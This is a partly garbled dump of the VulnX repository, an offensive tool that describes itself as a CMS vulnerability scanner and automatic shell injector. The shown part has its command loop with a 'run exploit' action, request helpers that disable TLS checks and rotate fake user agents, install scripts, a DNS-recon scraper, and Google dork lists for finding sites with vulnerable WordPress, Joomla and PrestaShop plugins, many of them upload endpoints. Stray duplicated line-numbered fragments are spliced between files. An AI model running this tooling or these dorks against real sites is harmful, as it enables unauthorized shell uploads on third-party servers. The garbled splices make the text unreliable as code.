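            history.append(cmd_interpreter)
            if cmd_interpreter == 'back':
                break
            elif cmd_interpreter == 'run exploit':
                print('\n%s[*]%s Running exploits..' % (B, end))
                # Bare host names get a scheme; http:// is the legacy default,
                # so an https-only target must be typed with its scheme.
                # (The old code read url_root before ever assigning it.)
                url_root = target if target.startswith('http') else 'http://' + target
                self.__runExploits(url_root, headers)
            elif help_regx.search(cmd_interpreter) or cmd_interpreter == '?':
                Helpers._url_action_help()
            elif exit_regx.search(cmd_interpreter) or cmd_interpreter == 'quit':
                sys.exit()
            else:
                print("use (help) (?) to show man commands.")

    def send_commands(self, cmd):
        """Top-level read-eval loop.

        ``cmd`` is kept for callers but overwritten by the first prompt.
        Dispatches to the target session, the dorks session, or one of the
        global commands; unknown input gets a pointer to ``help``.
        """
        while True:
            Cli.autoComplete_Global()
            cmd = input("%s%svulnx%s > " % (bannerblue2, W_UL, end))
            history.append(cmd)
            if url_regx.search(cmd):
                self._url_session(Cli.getUrl(cmd))
            elif dork_regx.search(cmd):
                self.setdorkCLI(cmd)
            elif exit_regx.search(cmd) or cmd == 'quit':
                sys.exit()
            elif help_regx.search(cmd) or cmd == '?':
                Helpers._general_help()
            elif cls_regx.search(cmd) or cmd == 'cls':
                Cli._clearscreen()
            elif history_regx.search(cmd):
                Cli._print_history()
            elif exec_regx.search(cmd):
                Cli._exec(cmd)
            elif var_regx.search(cmd):
                Cli.global_variables(dorkname, output_dir, numberpage, url, timeout)
            else:
                print("use (help) (?) to show man commands.")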
to show man commands.") 553 | -------------------------------------------------------------------------------- /common/__init__.py: -------------------------------------------------------------------------------- 1 | """The vulnx commonfiles.""" 2 | -------------------------------------------------------------------------------- /common/banner.py: -------------------------------------------------------------------------------- 1 | import sys 2 | from common.colors import bannerblue , bannerblue2 ,W ,Y ,R,end 3 | 4 | def banner(): 5 | print("""%s 6 | 7 | .:. .:, 8 | xM; XK. 9 | dx' .lO. 10 | do ,0. 11 | .c.lN' , '. .k0.:' 12 | xMMk;d;''cOM0kWXl,',locMMX. 13 | .NMK. :WMMMMMMMx dMMc 14 | lMMO lWMMMMMMMMMO. lMMO 15 | cWMxxMMMMMMMMMMMMKlWMk 16 | .xWMMMMMMMMMMMMMMM0,%s 17 | .,OMd,,,;0MMMO,. 18 | .l0O.%sVXVX%sOX.%sVXVX%s0MO%sVXVX%s.0Kd, 19 | lWMMO0%sVXVX0%sOX.%sVXVX%sl%sVXVX%s.VXNMMO 20 | .MMX;.N0%sVXVX0%s0X.%sVXVXVX0%s.0M:.OMMl 21 | .OXc ,MMO%sVXVX0%sVX%s .VXVX0%s0MMo ,0X' 22 | 0x. :XMMMk%sVXVX.%sXO.%sVXVX%sdMMMWo. :X' 23 | .d 'NMMMMMMk%sVXVX%s..%sVXVX0%s.XMMMMWl ;c 24 | 'NNoMMMMMMx%sVXVXVXVXVX0.%sXMMk0Mc 25 | .NMx OMMMMMMd%sVXVXVX%sl%sVXVX%s.NW.;MMc 26 | :NMMd .NMMMMMMd%sVXVX%sdMd,,,,oc ;MMWx 27 | .0MN, 'XMMMMMMo%sVX%soMMMMMMWl 0MW, 28 | .0. .xWMMMMM:lMMMMMM0, kc 29 | ,O. .:dOKXXXNKOxc. do 30 | '0c -VulnX- ,Ol 31 | ;. :. 
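%s# Coded By Anouar Ben Saad -%s @anouarbensaad
%s"""
    %
    (bannerblue,bannerblue2,
    W,bannerblue2,W,bannerblue2,W,bannerblue2,
    W,bannerblue2,W,bannerblue2,W,bannerblue2,
    W,bannerblue2,W,bannerblue2,
    W,bannerblue2,W,bannerblue2,
    W,bannerblue2,W,bannerblue2,
    W,bannerblue2,W,bannerblue2,
    W,bannerblue2,
    W,bannerblue2,W,bannerblue2,
    W,bannerblue2,
    W,bannerblue2,
    W,Y,end
    ))
-------------------------------------------------------------------------------- /common/colors.py: --------------------------------------------------------------------------------
'''
Module Of Colors.
OS : Ubuntu

ANSI escape sequences for the banner, the default colours and the status
prefixes ([~], [+], [-], [!], [?]) and verdict words (FAIL/VULN/OPEN/CLOSE).
On platforms whose default consoles do not render ANSI sequences they are
all set to the empty string, so callers can always concatenate them.
'''

import sys

if sys.platform.lower().startswith(('os', 'win', 'darwin', 'ios')):
    # Colors shouldn't be displayed on Mac and Windows
    bannerblue = bannerblue2 = yellowhead = \
    W = Y = R = G = B = bg = green = \
    run = good = bad = info = red = end = que = \
    failexploit = vulnexploit = portopen = portclose = ''
else:
    #banner Colors
    bannerblue = '\033[34m'
    bannerblue2 = '\033[1;1;94m'
    yellowhead = '\033[1;1;94m'
    #default colors
    W = '\033[97m'  # white
    Y = '\033[93m'  # yellow
    R = '\033[91m'
    G = '\033[92m'
    B = '\033[94m'
    bg = '\033[7;91m'
    green = '\033[92m'
    #action colors
    run = '\033[93m[~]\033[0m'
    good = '\033[92m[+]\033[0m'
    bad = '\033[91m[-]\033[0m'
    info = '\033[93m[!]\033[0m'
    red = '\033[91m'
    end = '\033[0m'
    que = '\033[94m[?]\033[0m'
    #test colors
    failexploit = '\033[91mFAIL\033[0m'
    vulnexploit = '\033[92mVULN\033[0m'
    portopen = '\033[92mOPEN \033[0m'
    portclose = '\033[91mCLOSE\033[0m'
-------------------------------------------------------------------------------- /common/output_wr.py: --------------------------------------------------------------------------------

import os
import sys

def writelogs(data, data_name, output_dir):
    """Write each non-empty result list to ``<output_dir>/<name>.txt``.

    ``data`` and ``data_name`` are parallel sequences; entries whose data is
    empty produce no file.  ``output_dir`` is used as given: no directory is
    created and no sanitising is done here -- the CLI's ``output`` command
    restricts the name to ``\\w+`` (a single path component), and other
    callers are expected to pass a directory they already trust.
    """
    for entries, name in zip(data, data_name):
        if not entries:
            continue
        filepath = os.path.join(output_dir, name + '.txt')
        # Explicit UTF-8: the old encode().decode() round-trip was a no-op and
        # the file was still written in the platform default encoding.
        with open(filepath, 'w', encoding='utf-8') as out_file:
            out_file.write('\n'.join(entries))
            out_file.write('\n')
-------------------------------------------------------------------------------- /common/requestUp.py: --------------------------------------------------------------------------------

import random
from collections.abc import Mapping

import requests
from requests.exceptions import TooManyRedirects

from common.uriParser import parsing_url as hostd

SESSION = requests.Session()
SESSION.max_redirects = 2

def random_UserAgent():
    """Return one browser User-Agent string picked at random.

    Rotation only makes the scanner look less uniform in server logs; it is
    not a security control, so ``random`` (not ``secrets``) is fine here.
    """
    useragents_rotate = [
        "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]",
        "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)",
        "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
        "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)",
        "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)",
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9",
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246",
        "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)",
        "Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
        "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
        "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02",
        "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36",
        "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)",
        "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0",
        "Mozilla/5.0 (X11; CrOS x86_64 8172.45.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.64 Safari/537.36",
        "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1",
        "Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8",
        "Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.01"
    ]
    return random.choice(useragents_rotate)

def _merge_headers(headers):
    """Copy ``headers`` (when it is a mapping) and default the User-Agent.

    The previous implementation replaced the argument with an empty ``set()``,
    which silently threw away every header the caller passed and never used
    ``random_UserAgent`` despite the comment saying so.
    """
    merged = dict(headers) if isinstance(headers, Mapping) else {}
    if not any(key.lower() == 'user-agent' for key in merged):
        merged['User-Agent'] = random_UserAgent()
    return merged

def getrequest(
    url,
    headers,
    timeout=3,
):
    """GET ``url`` and return the response body as text.

    ``headers`` is any mapping of extra headers (non-mappings are ignored).
    Redirects are capped by ``SESSION.max_redirects``; ``timeout`` is the
    per-request socket timeout in seconds.

    SECURITY NOTE: ``verify=False`` disables TLS certificate validation on
    purpose -- the targets of this scanner are frequently misconfigured
    hosts.  The cost is that a network-level attacker can alter what is
    read, so callers must treat the body as untrusted text (parsed, never
    executed) and must not send credentials through this helper.
    """
    response = SESSION.get(
        url,
        headers=_merge_headers(headers),
        verify=False,
        timeout=timeout,
        stream=True,
    )
    return response.text

def sendrequest(
    url,
    headers=None,
    data=None,
    timeout=3,
):
    """POST ``data`` to ``url`` and return the response body as text.

    Same TLS caveat as ``getrequest``.  ``data`` is handed to requests
    unchanged; it used to be replaced by an empty ``set()``, so every POST
    went out with an empty body regardless of what the caller supplied.
    """
    response = SESSION.post(
        url,
        data=data,
        headers=_merge_headers(headers),
        verify=False,
        timeout=timeout,
        stream=True,
    )
    return response.text
-------------------------------------------------------------------------------- /common/threading.py: --------------------------------------------------------------------------------
import concurrent.futures

from common.colors import info

def threads(function, thread_count):
    """ Threadpool Uses

    Run ``function`` once on a ``ThreadPoolExecutor`` of ``thread_count``
    workers and print a progress counter as futures complete.  Only a single
    task is submitted, so the pool size does not add parallelism by itself;
    the pool is shut down when the ``with`` block exits.
    """
    with concurrent.futures.ThreadPoolExecutor(max_workers=thread_count) as pool:
        # as_completed() takes an iterable of futures; the bare Future used
        # to be passed, which raised TypeError before any progress was shown.
        futures = [pool.submit(function)]
        for i, _ in enumerate(concurrent.futures.as_completed(futures)):
            print('%s Progress IN : %i' % (info, i + 1), end='\r')
    print('')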
+ 1), end='\r') 12 | print('') -------------------------------------------------------------------------------- /common/uriParser.py: -------------------------------------------------------------------------------- 1 | import re 2 | from urllib.parse import urlparse 3 | 4 | def parsing_url(url): 5 | host = urlparse(url).netloc 6 | return host 7 | -------------------------------------------------------------------------------- /config/vulnx.desktop: -------------------------------------------------------------------------------- 1 | [Desktop Entry] 2 | Name=vulnx 3 | Comment=VulnX 🕷️ Cms and vulnerabilites detector, & An intelligent bot auto shell injector. 4 | Encoding=UTF-8 5 | Exec=sh -c "vulnx;${SHELL:-bash}" 6 | Icon=vulnxicon.png 7 | StartupNotify=false 8 | Terminal=true 9 | Type=Application 10 | Categories=02-Vulnerability-Analysis; 11 | X-Kali-Package=vulnx 12 | Name[C]=vulnx 13 | -------------------------------------------------------------------------------- /config/vulnxicon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LulzSecToolkit/vulnx/d5b6fba86c0d316622ad1f12d11884bd85a7a7cb/config/vulnxicon.png -------------------------------------------------------------------------------- /docker/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3-alpine 2 | MAINTAINER BENSAAD Anouar bensaad.tig@gmail.com 3 | 4 | # Project Informations. 
5 | LABEL name vulnx 6 | LABEL src "https://github.com/anouarbensaad/vulnx" 7 | LABEL creator anouarbensaad 8 | LABEL desc "Vulnx is a cms and vulnerabilites detection, an intelligent auto shell injector,\ 9 | fast cms detection of target and fast scanner and informations gathering like\ 10 | subdomains, \ 11 | ipaddresses,\ 12 | country, \ 13 | org, \ 14 | timezone, \ 15 | region, \ 16 | ans \ 17 | and more ...\ 18 | Instead of injecting shell and checking it works like all the other tools do,\ 19 | vulnx analyses the response with and recieve if shell success uploaded or no.\ 20 | vulnx is searching for urls with dorks." 21 | 22 | # Clonning Vulnx From Github 23 | RUN apk add --no-cache git && \ 24 | git clone https://github.com/anouarbensaad/vulnx.git 25 | 26 | # Make vulnx group 27 | RUN addgroup vulnx 28 | 29 | # added \\vulnx [group] secondary group to vulnx. 30 | RUN adduser -G vulnx -g "vulnx user" -s /bin/sh -D vulnx 31 | 32 | # change vulnx owner of directory of project. 33 | RUN chown -R vulnx vulnx 34 | 35 | # Switch user. 36 | USER vulnx 37 | 38 | ENV APP_HOME=vulnx 39 | 40 | # Working−Directory 41 | WORKDIR $APP_HOME 42 | 43 | # Install Pip Packages. 44 | RUN pip install --user --upgrade pip && \ 45 | pip install --user -r ./requirements.txt 46 | 47 | # Add Mount Volume Docker To Save All changes. 48 | VOLUME [ "/vulnx" ] 49 | 50 | # Entrypoint -> Command : While Creating Container. 51 | ENTRYPOINT [ "python", "vulnx.py" ] 52 | 53 | # Default Command When Starting The Container. 54 | CMD ["--help"] 55 | -------------------------------------------------------------------------------- /docker/README: -------------------------------------------------------------------------------- 1 | ### Docker Documentation. 2 | Welcome to the vulnx DOCKER documentation. 3 | The vulnx DOCKER documentation is generated as a rule of usage docker. 
4 | 5 | You can build docker-image & run container for no problem of comptability: 6 | $ docker build -t vulnx ./docker/ 7 | $ docker run -it --name vulnx vulnx:latest -u http://example.com 8 | -------------------------------------------------------------------------------- /docker/debian_stretch/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM debian:stretch-slim 2 | MAINTAINER BENSAAD Anouar bensaad.tig@gmail.com 3 | 4 | # Project Informations. 5 | LABEL name vulnx 6 | LABEL src "https://github.com/anouarbensaad/vulnx" 7 | LABEL creator anouarbensaad 8 | LABEL desc "Vulnx is a cms and vulnerabilites detection, an intelligent auto shell injector,\ 9 | fast cms detection of target and fast scanner and informations gathering like\ 10 | subdomains, \ 11 | ipaddresses,\ 12 | country, \ 13 | org, \ 14 | timezone, \ 15 | region, \ 16 | ans \ 17 | and more ...\ 18 | Instead of injecting shell and checking it works like all the other tools do,\ 19 | vulnx analyses the response with and recieve if shell success uploaded or no.\ 20 | vulnx is searching for urls with dorks." 21 | 22 | # Install Git, 23 | RUN apt-get update -qq && \ 24 | apt-get install -qq -y --no-install-recommends --no-install-suggests && \ 25 | git && \ 26 | rm -rf /var/lib/apt/lists/* && \ 27 | apt-get clean && \ 28 | rm -rf /tmp/* /var/tmp/* /usr/share/doc/* 29 | 30 | # Make Vulnx Directory & Clonning Vulnx From Github 31 | RUN mkdir -p /usr/share/vulnx && cd usr/share/vulnx && \ 32 | git clone https://www.github.com/anouarbensaad/vulnx 33 | 34 | # Make vulnx group 35 | RUN addgroup vulnx 36 | 37 | # added \\vulnx [group] secondary group to vulnx. 38 | RUN adduser -G vulnx -g "vulnx user" -s /bin/sh -D vulnx 39 | 40 | # change vulnx owner of directory of project. 41 | RUN chown -R vulnx vulnx 42 | 43 | # Switch user. 
44 | USER vulnx 45 | 46 | # Working−Directory 47 | WORKDIR vulnx 48 | 49 | # Install Python3 & Pip 3 50 | RUN apt-get -qq update \ 51 | apt-get install -qq -y --no-install-recommends \ 52 | python3 \ 53 | python3-pip && \ 54 | rm -rf /var/lib/apt/lists/* && \ 55 | apt-get clean && \ 56 | rm -rf /tmp/* /var/tmp/* /usr/share/doc/* 57 | 58 | # Install Pip Packages. 59 | RUN pip3 install requests && \ 60 | pip3 install bs4 61 | 62 | # Add Mount Volume Docker To Save All changes. 63 | VOLUME [ "/vulnx" ] 64 | 65 | #run container with it mode & run python3 vulnx.py -u ... 66 | -------------------------------------------------------------------------------- /install.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | red="\e[0;31m" 4 | blue="\e[0;94m" 5 | green="\e[0;32m" 6 | off="\e[0m" 7 | #vulnx install function for Android. termux 8 | function banner(){ 9 | echo -e "===== VULNX INSTALL =====" 10 | } 11 | function termuxOS() { 12 | echo -e "$red [$green+$red]$off Installing Python ..."; 13 | pkg install python 14 | echo -e "$red [$green+$red]$off Installing Packages ..."; 15 | pip install -r ./requirements.txt 16 | echo -e "$red [$green+$red]$off Checking directories ..." 17 | if [ -e "/data/data/com.termux/files/usr/share/vulnx" ]; then 18 | echo -e "$red [$green+$red]$off A previous installation was found Do you want to replace it? 
[Y/n]: " 19 | read replace 20 | if [ "$replace" == "y" ] || [ "$replace" == "Y" ] || [ -z "$replace" ]; then 21 | rm -r "/data/data/com.termux/files/usr/share/vulnx" 22 | rm "/data/data/com.termux/files/usr/bin/vulnx" 23 | else 24 | echo -e "$red [$green✘$red]$off If You Want To Install You Must Remove Previous Installations"; 25 | echo -e "$red [$green✘$red]$off Installation Failed"; 26 | exit 27 | fi 28 | fi 29 | echo -e "$red [$green+$red]$off Installing ..."; 30 | mkdir "/data/data/com.termux/files/usr/share/vulnx" 31 | cp "vulnx.py" "/data/data/com.termux/files/usr/share/vulnx" 32 | cp "install.sh" "/data/data/com.termux/files/usr/share/vulnx" 33 | cp "update.sh" "/data/data/com.termux/files/usr/share/vulnx" 34 | cp -r "./common" "/data/data/com.termux/files/usr/share/vulnx" 35 | cp -r "./modules" "/data/data/com.termux/files/usr/share/vulnx" 36 | cp -r "./shell" "/data/data/com.termux/files/usr/share/vulnx" 37 | chmod +x /data/data/com.termux/files/usr/share/vulnx/update.sh 38 | echo -e "$red [$green+$red]$off Creating Symbolic Link ..."; 39 | echo "#!/data/data/com.termux/files/usr/bin/bash 40 | python /data/data/com.termux/files/usr/share/vulnx/vulnx.py" '${1+"$@"}' > "vulnx"; 41 | cp "vulnx" "/data/data/com.termux/files/usr/bin" 42 | chmod +x "/data/data/com.termux/files/usr/bin/vulnx" 43 | rm "vulnx"; 44 | if [ -d "/data/data/com.termux/files/usr/share/vulnx" ] ; 45 | then 46 | echo -e "$red [$green+$red]$off Tool successfully installed and will start in 5s!"; 47 | echo -e "$red [$green+$red]$off You can execute tool by typing vulnx" 48 | sleep 5; 49 | vulnx 50 | else 51 | echo -e "$red [$green✘$red]$off Tool Cannot Be Installed On Your System! Use It As Portable !"; 52 | exit 53 | fi 54 | } 55 | #vulnx install function for debian operating system. linux. 56 | function debianOS(){ 57 | echo -e "$red [$green+$red]$off Installing python3... 
"; 58 | sudo apt-get install -y python3 59 | pip install -r ./requirements.txt 60 | echo -e "$red [$green+$red]$off Checking directories... " 61 | if [ -d "/usr/share/VulnX" ]; then 62 | echo -e "$red [$green+$red]$off A Directory VulnX Was Found! Do You Want To Replace It? [Y/n]:" ; 63 | read replace 64 | if [ "$replace" == "y" ] || [ "$replace" == "Y" ] || [ -z "$replace" ]; then 65 | sudo rm -r "/usr/share/vulnx" 66 | sudo rm "/usr/share/icons/vulnxicon.png" 67 | sudo rm "/usr/share/applications/vulnx.desktop" 68 | sudo rm "/usr/local/bin/vulnx" 69 | else 70 | echo -e "$red [$green✘$red]$off If You Want To Install You Must Remove Previous Installations"; 71 | echo -e "$red [$green✘$red]$off Installation Failed"; 72 | exit 73 | fi 74 | fi 75 | echo -e "$red [$green+$red]$off Installing ..."; 76 | echo -e "$red [$green+$red]$off Creating Symbolic Link ..."; 77 | echo -e "#!/bin/bash 78 | python3 /usr/share/vulnx/vulnx.py" '${1+"$@"}' > "vulnx"; 79 | chmod +x "vulnx"; 80 | sudo mkdir "/usr/share/vulnx" 81 | sudo cp "install.sh" "/usr/share/vulnx" 82 | sudo cp "update.sh" "/usr/share/vulnx" 83 | sudo cp -r "./common" "/usr/share/vulnx/" 84 | sudo cp -r "./modules" "/usr/share/vulnx/" 85 | sudo cp -r "./shell" "/usr/share/vulnx/" 86 | sudo chmod +x /usr/share/vulnx/update.sh 87 | sudo cp "vulnx.py" "/usr/share/vulnx" 88 | sudo cp "config/vulnxicon.png" "/usr/share/icons" 89 | sudo cp "config/vulnx.desktop" "/usr/share/applications" 90 | sudo cp "vulnx" "/usr/local/bin/" 91 | rm "vulnx"; 92 | if [ -d "/usr/share/vulnx" ] ; 93 | then 94 | echo -e "$red [$green+$red]$off Tool Successfully Installed And Will Start In 5s!"; 95 | echo -e "$red [$green+$red]$off You can execute tool by typing vulnx" 96 | sleep 5; 97 | vulnx 98 | else 99 | echo -e "$red [$green✘$red]$off Tool Cannot Be Installed On Your System! 
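Use It As Portable !";
      exit
    fi
}
#main
if [ -d "/data/data/com.termux/files/usr/" ]; then
  banner
  echo -e "$red [$green+$red]$off Vulnx Will Be Installed In Your System";
  termuxOS
elif [ -d "/usr/bin/" ];then
  banner
  echo -e "$red [$green+$red]$off Vulnx Will Be Installed In Your System";
  debianOS
else
  echo -e "$red [$green✘$red]$off Tool Cannot Be Installed On Your System! Use It As Portable !";
  exit
fi
-------------------------------------------------------------------------------- /modules/__init__.py: --------------------------------------------------------------------------------
"""The vulnx Modules."""
-------------------------------------------------------------------------------- /modules/dnsLookup.py: --------------------------------------------------------------------------------
import requests
import re
import base64
import json
from common.colors import red, green, bg, G, R, W, Y, G , good , bad , run , info , end , que , bannerblue
from bs4 import BeautifulSoup
from common.uriParser import parsing_url as hostd

# dnsdumpster.com is a third-party service: every lookup in this module sends
# the target's domain name to it over the network.  Keep that in mind on
# engagements where the target must not be disclosed to outside parties.
DNSDUMPSTER_URL = 'https://dnsdumpster.com/'
# Per-call bound in seconds so a stalled service cannot hang the CLI forever.
REQUEST_TIMEOUT = 30

def results(table):
    """Parse one dnsdumpster result table into a list of record dicts.

    Each data row is expected to have three cells: host (domain and HTTP
    header split by a ``<br/>``), ip (address plus a reverse-DNS span) and
    extra info (AS number, provider, country span).  Rows that do not fit
    this shape -- header rows, cells without the span -- are skipped, since
    the service's markup is not under our control.
    """
    res = []
    pattern_ip = r'([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})'
    for tr in table.findAll('tr'):
        tds = tr.findAll('td')
        try:
            ip = re.findall(pattern_ip, tds[1].text)[0]
            # The listing had lost the tag here; the host cell holds
            # "domain<br/>header", so split on the tag first.
            domain = str(tds[0]).split('<br/>')[0].split('>')[1]
            header = ' '.join(tds[0].text.replace('\n', '').split(' ')[1:])
            reverse_dns = tds[1].find('span', attrs={}).text
            additional_info = tds[2].text
            country = tds[2].find('span', attrs={}).text
        except (IndexError, AttributeError):
            # Narrowed from a bare except: only the "row has another shape"
            # failures are expected and safe to ignore.
            continue
        autonomous_system = additional_info.split(' ')[0]
        provider = ' '.join(additional_info.split(' ')[1:]).replace(country, '')
        res.append({'domain': domain,
                    'ip': ip,
                    'reverse_dns': reverse_dns,
                    'as': autonomous_system,
                    'provider': provider,
                    'country': country,
                    'header': header})
    return res

def text_record(table):
    """Return the text of every ``<td>`` in ``table``, in document order."""
    return [td.text for td in table.findAll('td')]


def dnsdumper(url):
    """Print the DNS and MX records dnsdumpster.com knows for ``url``'s host.

    Flow: GET the form to obtain the Django CSRF token, POST the domain with
    that token as both cookie and form field (one session, so the server's
    own csrftoken cookie is kept too), then scrape the first two result
    tables.  Nothing is returned; a missing token, a non-200 reply or
    unexpected markup is reported and the function returns early.  The map
    image the old code downloaded and discarded is no longer fetched.
    """
    domain = hostd(url)
    session = requests.Session()
    response = session.get(DNSDUMPSTER_URL, timeout=REQUEST_TIMEOUT)
    soup = BeautifulSoup(response.text, 'html.parser')
    token_inputs = soup.findAll('input', attrs={'name': 'csrfmiddlewaretoken'})
    if not token_inputs:
        # The old except clause re-ran the very same lookup; a missing token
        # means the page layout changed or the request was blocked.
        print(' %s Could not retrieve the dnsdumpster CSRF token' % bad)
        return
    csrf_token = token_inputs[0]['value']
    print(' %s Retrieved token: %s' % (info, csrf_token))
    cookies = {'csrftoken': csrf_token}
    headers = {'Referer': DNSDUMPSTER_URL}
    data = {'csrfmiddlewaretoken': csrf_token, 'targetip': domain}
    response = session.post(DNSDUMPSTER_URL, cookies=cookies, data=data,
                            headers=headers, timeout=REQUEST_TIMEOUT)
    if response.status_code != 200:
        print(' %s dnsdumpster answered HTTP %s' % (bad, response.status_code))
        return
    soup = BeautifulSoup(response.content, 'html.parser')
    tables = soup.findAll('table')
    if len(tables) < 2:
        print(' %s No DNS/MX tables in the dnsdumpster response' % bad)
        return
    res = {'domain': domain,
           'dns_records': {'dns': results(tables[0]),
                           'mx': results(tables[1])}}
    entry_fmt = " %s Host : {domain} \n %s IP : {ip} \n %s AS : {as} \n %s----------------%s"
    print(' %s Search for DNS Servers' % que)
    for entry in res['dns_records']['dns']:
        print(entry_fmt.format(**entry) % (good, good, good, bannerblue, end))
    print(' %s Search for MX Records ' % que)
    for entry in res['dns_records']['mx']:
        print(entry_fmt.format(**entry) % (good, good, good, bannerblue, end))
def domain_info(url):
    domain = hostd(url)
    dnsdumpster_url = 'https://dnsdumpster.com/'
    response = requests.Session().get(dnsdumpster_url).text
    # If no match is found, the return object won't have group method, so check.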
80 | try: 81 | csrf_token = re.search(r"name='csrfmiddlewaretoken' value='(.*?)'", response).group(1) 82 | except AttributeError: # No match is found 83 | csrf_token = re.search(r"name='csrfmiddlewaretoken' value='(.*?)'", response) 84 | cookies = {'csrftoken': csrf_token} 85 | headers = {'Referer': 'https://dnsdumpster.com/'} 86 | data = {'csrfmiddlewaretoken': csrf_token, 'targetip': domain } 87 | response = requests.Session().post('https://dnsdumpster.com/',cookies=cookies, data=data, headers=headers) 88 | image = requests.get('https://dnsdumpster.com/static/map/%s.png' % domain) 89 | if response.status_code == 200: 90 | soup = BeautifulSoup(response.content, 'html.parser') 91 | tables = soup.findAll('table') 92 | res = {} 93 | res['domain'] = domain 94 | res['dns_records'] = {} 95 | res['dns_records']['host'] = results(tables[3]) 96 | print(' %s SubDomains' % que) 97 | for entry in res['dns_records']['host']: 98 | print((" %s SubDomain : {domain} \n %s IP : {ip} \n %s----------------%s".format(**entry)% (good,good,bannerblue,end))) 99 | -------------------------------------------------------------------------------- /modules/dorksEngine.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Dorks Engine Module. 
3 | github Repository : http://github.com/anouarbensaad/findorks 4 | ''' 5 | 6 | import requests 7 | import re 8 | import time 9 | import random 10 | import os 11 | from common.colors import run,W,end,good,bad,que,info,bannerblue 12 | from common.uriParser import parsing_url as parsify 13 | filename = time.strftime("%Y-%m-%d-%H%M%S-Dorks") 14 | output_dirdorks = 'logs'+'/Dorks' 15 | 16 | if not os.path.exists(output_dirdorks): # if the directory doesn't exist 17 | os.mkdir(output_dirdorks) # create a new directory 18 | export = open('%s/%s.txt' % (output_dirdorks,filename),'w') 19 | else: 20 | export = open('%s/%s.txt' % (output_dirdorks,filename),'w') 21 | 22 | 23 | wp_contentdorks = { 24 | 'blaze' : 'inurl:"/wp-content/plugins/blaze-slide-show-for-wordpress/"', 25 | 'catpro' : 'inurl:"/wp-content/plugins/wp-catpro/"', 26 | 'cherry' : 'inurl:"/wp-content/plugins/cherry-plugin/"', 27 | 'dm' : 'inurl:"/wp-content/plugins/downloads-manager/"', 28 | 'fromcraft' : 'inurl:"/wp-content/plugins/formcraft/file-upload/"', 29 | 'synoptic' : 'inurl:"/wp-content/themes/synoptic/lib/avatarupload"', 30 | 'shop' : 'inurl:"/wp-content/plugins/wpshop/includes/"', 31 | 'revslider' : 'inurl "/wp-content/plugins/revslider/"', 32 | 'adsmanager' : 'inurl:"/wp-content/plugins/simple-ads-manager/"', 33 | 'inboundiomarketing': 'inurl:"/wp-content/plugins/inboundio-marketing/"', 34 | 'thumbslider' : 'inurl:"/wp-content/plugins/wp-responsive-thumbnail-slider"', 35 | } 36 | wp_admindorks = { 37 | 'wysija' : 'inurl":/wp-admin/admin-post.php?page=wysija_campaigns"', 38 | 'powerzoomer' : 'inurl:"/wp-admin/admin.php?page=powerzoomer_manage"', 39 | 'showbiz' : 'inurl:"/wp-admin/admin-ajax.php"', 40 | } 41 | 42 | wpajx = { 43 | 'jobmanager' : 'inurl:"/jm-ajax/upload_file/"', 44 | } 45 | 46 | 47 | wpindex = { 48 | 'injection' : 'inurl:"/index.php/wp-json/wp/"', 49 | } 50 | 51 | 52 | joomla = { 53 | 'comjce' : 'inurl":index.php?option=com_jce"', 54 | 'comfabrik' : 
'inurl":index.php?option=com_fabrik"', 55 | 'comjdownloads' : 'inurl":index.php?option=com_fabrik"', 56 | 'comfoxcontact' : 'inurl":index.php?option=com_foxcontact"', 57 | } 58 | 59 | prestashop = { 60 | 'columnadverts' : 'inurl":/modules/columnadverts/"', 61 | 'soopabanners' : 'inurl":/modules/soopabanners/"', 62 | 'vtslide' : 'inurl":/modules/soopabanners/"', 63 | 'simpleslideshow' : 'inurl":/modules/simpleslideshow/"', 64 | 'productpageadverts' : 'inurl":/modules/productpageadverts/"', 65 | 'productpageadvertsb' : 'inurl":/modules/homepageadvertise2/"', 66 | 'jro_homepageadvertise' : 'inurl":/modules/jro_homepageadvertise/"', 67 | 'attributewizardpro' : 'inurl":/modules/attributewizardpro/"', 68 | 'oneattributewizardpro' : 'inurl":/modules/1attributewizardpro/"', 69 | 'attributewizardpro_old' : 'inurl":/modules/attributewizardpro.OLD/"', 70 | 'attributewizardpro_x' : 'inurl":/modules/attributewizardpro_x/"', 71 | 'advancedslider' : 'inurl":/modules/advancedslider/"', 72 | 'cartabandonmentpro' : 'inurl":/modules/cartabandonmentpro/"', 73 | 'cartabandonmentpro_old' : 'inurl":/modules/cartabandonmentproOld/"' , 74 | 